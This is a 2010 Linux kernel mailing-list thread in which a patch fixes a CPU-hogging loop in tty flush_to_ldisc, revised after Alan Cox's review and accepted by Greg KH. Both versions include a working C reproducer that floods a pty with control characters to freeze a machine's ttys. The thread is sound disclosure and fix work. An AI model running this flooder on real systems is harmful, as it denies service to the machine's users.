
[PATCH] tty: prevent DOS in the flush_to_ldisc


Jiri Olsa

Oct 27, 2010, 3:20:01 AM
hi,

there's a small window inside the flush_to_ldisc function
where the tty is unlocked while the ldisc's receive_buf
function is called. If a new buffer is added to the tty during
this window, the processing might never leave flush_to_ldisc.

This scenario hogs the CPU, starving other tty processing and
making it impossible to interact with the machine through a tty.
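
The loop in question looks roughly like this (a condensed sketch of
flush_to_ldisc, with flag handling, flushing checks and buffer freeing
elided):

---
spin_lock_irqsave(&tty->buf.lock, flags);
while ((head = tty->buf.head) != NULL) {
	/* ... compute count, char_buf, flag_buf from head ... */
	spin_unlock_irqrestore(&tty->buf.lock, flags);
	/*
	 * The unlock window: a writer can queue new buffers here,
	 * so tty->buf.head may never become NULL and the loop
	 * never terminates.
	 */
	disc->ops->receive_buf(tty, char_buf, flag_buf, count);
	spin_lock_irqsave(&tty->buf.lock, flags);
}
spin_unlock_irqrestore(&tty->buf.lock, flags);
---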

I was able to exploit this via the pty interface by sending only
control characters to the master input, causing flush_to_ldisc
to be scheduled repeatedly without ever generating any output.

To reproduce, run multiple instances of the following code.

---
#define _GNU_SOURCE		/* for getpt() */
#define _XOPEN_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>		/* for write() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
	int i, slave, master = getpt();
	char buf[8192];

	sprintf(buf, "%s", ptsname(master));
	grantpt(master);
	unlockpt(master);

	/* open the slave end so the pty pair is fully set up */
	slave = open(buf, O_RDWR);
	if (slave < 0) {
		perror("open slave failed");
		return 1;
	}

	/* fill the buffer with control characters only */
	for (i = 0; i < sizeof(buf); i++)
		buf[i] = rand() % 32;

	/* flood the master side; nobody ever reads the slave */
	while (1)
		write(master, buf, sizeof(buf));

	return 0;
}
---
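
Compile it with e.g. gcc -o pty-flood pty-flood.c (the file name is
arbitrary) and start several instances in parallel; the machine should
quickly become unresponsive on its ttys.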

The attached patch (based on the -next tree) fixes this by adding a
threshold for the amount of processed data. When the threshold is
reached, the current work is rescheduled so that other work gets a
chance to run.

The threshold is set to the maximum size of the tty buffer.

wbr,
jirka


Signed-off-by: Jiri Olsa <jo...@redhat.com>
---
 drivers/char/tty_buffer.c |   15 ++++++++++++++-
 include/linux/tty.h       |    1 +
 2 files changed, 15 insertions(+), 1 deletions(-)

diff --git a/drivers/char/tty_buffer.c b/drivers/char/tty_buffer.c
index cc1e985..7703114 100644
--- a/drivers/char/tty_buffer.c
+++ b/drivers/char/tty_buffer.c
@@ -58,7 +58,7 @@ static struct tty_buffer *tty_buffer_alloc(struct tty_struct *tty, size_t size)
 {
 	struct tty_buffer *p;
 
-	if (tty->buf.memory_used + size > 65536)
+	if (tty->buf.memory_used + size > TTY_BUFFER_MAXSIZE)
 		return NULL;
 	p = kmalloc(sizeof(struct tty_buffer) + 2 * size, GFP_ATOMIC);
 	if (p == NULL)
@@ -414,6 +414,7 @@ static void flush_to_ldisc(struct work_struct *work)
 
 	if (!test_and_set_bit(TTY_FLUSHING, &tty->flags)) {
 		struct tty_buffer *head;
+		int count_acc = 0;
 		while ((head = tty->buf.head) != NULL) {
 			int count;
 			char *char_buf;
@@ -436,11 +437,23 @@ static void flush_to_ldisc(struct work_struct *work)
 				schedule_delayed_work(&tty->buf.work, 1);
 				break;
 			}
+			/*
+			 * There's a possibility the tty might get a new buffer
+			 * added during the unlock window below. We could end
+			 * up spinning in here forever, hogging the CPU. To
+			 * avoid this, let's have a rest each time we process
+			 * the maximum one tty can hold.
+			 */
+			if (count_acc > TTY_BUFFER_MAXSIZE) {
+				schedule_delayed_work(&tty->buf.work, 1);
+				break;
+			}
 			if (count > tty->receive_room)
 				count = tty->receive_room;
 			char_buf = head->char_buf_ptr + head->read;
 			flag_buf = head->flag_buf_ptr + head->read;
 			head->read += count;
+			count_acc += count;
 			spin_unlock_irqrestore(&tty->buf.lock, flags);
 			disc->ops->receive_buf(tty, char_buf,
 						flag_buf, count);
diff --git a/include/linux/tty.h b/include/linux/tty.h
index e500171..708e299 100644
--- a/include/linux/tty.h
+++ b/include/linux/tty.h
@@ -80,6 +80,7 @@ struct tty_buffer {
  */
 
 #define TTY_BUFFER_PAGE (((PAGE_SIZE - sizeof(struct tty_buffer)) / 2) & ~0xFF)
+#define TTY_BUFFER_MAXSIZE (65536)
 
 
 struct tty_bufhead {
--
1.7.1

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majo...@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Jiri Olsa

Nov 8, 2010, 8:50:02 AM
hi, any feedback?

thanks,
jirka

Alan Cox

Nov 8, 2010, 9:20:02 AM
On Mon, 8 Nov 2010 14:48:41 +0100
Jiri Olsa <jo...@redhat.com> wrote:

> hi, any feedback?

Don't think I saw this before.

> > The attached patch (based on the -next tree) fixes this by adding a
> > threshold for the amount of processed data. When the threshold is
> > reached, the current work is rescheduled so that other work gets a
> > chance to run.
> >
> > The threshold is set to the maximum size of the tty buffer.

That is an n_tty concept really - most other ldiscs simply eat stuff as
it hits them. It's also something we've got some evidence may need to
become a variable, but would still make sense.

Would it be simpler to remember the queue end before the first iteration,
and not go past the queue end as it was at entry to flush_to_ldisc?
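
Roughly something like this (just an illustrative sketch, not code from
the thread; the variable name is made up):

/* sketch only: snapshot the queue end as it was at entry */
struct tty_buffer *end = tty->buf.tail;

while ((head = tty->buf.head) != NULL) {
	/* ... feed head to the ldisc as before ... */
	if (head == end) {
		/* don't walk past the snapshot; buffers queued during
		   the unlock windows wait for the next scheduled run */
		schedule_delayed_work(&tty->buf.work, 1);
		break;
	}
}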

Alan

Jiri Olsa

Nov 8, 2010, 1:10:02 PM
On Mon, Nov 08, 2010 at 02:09:38PM +0000, Alan Cox wrote:
> On Mon, 8 Nov 2010 14:48:41 +0100
> Jiri Olsa <jo...@redhat.com> wrote:
>
> > hi, any feedback?
>
> Don't think I saw this before.
>
> > > The attached patch (based on the -next tree) fixes this by adding a
> > > threshold for the amount of processed data. When the threshold is
> > > reached, the current work is rescheduled so that other work gets a
> > > chance to run.
> > >
> > > The threshold is set to the maximum size of the tty buffer.
>
> That is an n_tty concept really - most other ldiscs simply eat stuff as
> it hits them. It's also something we've got some evidence may need to
> become a variable, but would still make sense.
>
> Would it be simpler to remember the queue end before the first iteration,
> and not go past the queue end as it was at entry to flush_to_ldisc?

hi,

thanks for answering :)
I changed the patch to check on the tail buffer instead;
that seems better.

wbr,
jirka
---

There's a small window inside the flush_to_ldisc function
where the tty is unlocked while the ldisc's receive_buf
function is called. If a new buffer is added to the tty during
this window, the processing might never leave flush_to_ldisc.

This scenario hogs the CPU, starving other tty processing and
making it impossible to interact with the machine through a tty.

I was able to exploit this via the pty interface by sending only
control characters to the master input, causing flush_to_ldisc
to be scheduled repeatedly without ever generating any output.

To reproduce, run multiple instances of the following code.

- SNIP


#define _GNU_SOURCE		/* for getpt() */
#define _XOPEN_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>		/* for write() */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
	int i, slave, master = getpt();
	char buf[8192];

	sprintf(buf, "%s", ptsname(master));
	grantpt(master);
	unlockpt(master);

	/* open the slave end so the pty pair is fully set up */
	slave = open(buf, O_RDWR);
	if (slave < 0) {
		perror("open slave failed");
		return 1;
	}

	/* fill the buffer with control characters only */
	for (i = 0; i < sizeof(buf); i++)
		buf[i] = rand() % 32;

	/* flood the master side; nobody ever reads the slave */
	while (1)
		write(master, buf, sizeof(buf));

	return 0;
}
- SNIP

The attached patch (based on the -next tree) fixes this by checking
for the tty buffer tail. Once the tail is reached, the current work is
rescheduled so that other work can run.

wbr,
jirka

Signed-off-by: Jiri Olsa <jo...@redhat.com>
---

 drivers/char/tty_buffer.c |   14 ++++++++++++--
 1 files changed, 12 insertions(+), 2 deletions(-)

diff --git a/drivers/char/tty_buffer.c b/drivers/char/tty_buffer.c
index cc1e985..d8210ca 100644
--- a/drivers/char/tty_buffer.c
+++ b/drivers/char/tty_buffer.c
@@ -413,7 +413,8 @@ static void flush_to_ldisc(struct work_struct *work)
 	spin_lock_irqsave(&tty->buf.lock, flags);
 
 	if (!test_and_set_bit(TTY_FLUSHING, &tty->flags)) {
-		struct tty_buffer *head;
+		struct tty_buffer *head, *tail = tty->buf.tail;
+		int seen_tail = 0;
 		while ((head = tty->buf.head) != NULL) {
 			int count;
 			char *char_buf;
@@ -423,6 +424,15 @@ static void flush_to_ldisc(struct work_struct *work)
 			if (!count) {
 				if (head->next == NULL)
 					break;
+				/*
+				 * There's a possibility the tty might get a new
+				 * buffer added during the unlock window below.
+				 * We could end up spinning in here forever,
+				 * hogging the CPU. To avoid this, let's have a
+				 * rest each time we process the tail buffer.
+				 */
+				if (tail == head)
+					seen_tail = 1;
 				tty->buf.head = head->next;
 				tty_buffer_free(tty, head);
 				continue;
@@ -432,7 +442,7 @@ static void flush_to_ldisc(struct work_struct *work)
 			   line discipline as we want to empty the queue */
 			if (test_bit(TTY_FLUSHPENDING, &tty->flags))
 				break;
-			if (!tty->receive_room) {
+			if (!tty->receive_room || seen_tail) {
 				schedule_delayed_work(&tty->buf.work, 1);
 				break;
 			}
--
1.7.1

Alan Cox

Nov 9, 2010, 5:40:02 AM
> The attached patch (based on the -next tree) fixes this by checking
> for the tty buffer tail. Once the tail is reached, the current work is
> rescheduled so that other work can run.

Looks nice and tidy

Alan

Jiri Olsa

Nov 9, 2010, 5:50:02 AM
On Tue, Nov 09, 2010 at 10:35:39AM +0000, Alan Cox wrote:
> > The attached patch (based on the -next tree) fixes this by checking
> > for the tty buffer tail. Once the tail is reached, the current work is
> > rescheduled so that other work can run.
>
> Looks nice and tidy
>
> Alan

would you advise whom I should send it to, to get it picked up?

thanks,
jirka

Greg KH

Nov 9, 2010, 9:00:02 AM
On Tue, Nov 09, 2010 at 11:44:30AM +0100, Jiri Olsa wrote:
> On Tue, Nov 09, 2010 at 10:35:39AM +0000, Alan Cox wrote:
> > > The attached patch (based on the -next tree) fixes this by checking
> > > for the tty buffer tail. Once the tail is reached, the current work is
> > > rescheduled so that other work can run.
> >
> > Looks nice and tidy
> >
> > Alan
>
> would you advise whom I should send it to, to get it picked up?

I will.

thanks,

greg k-h
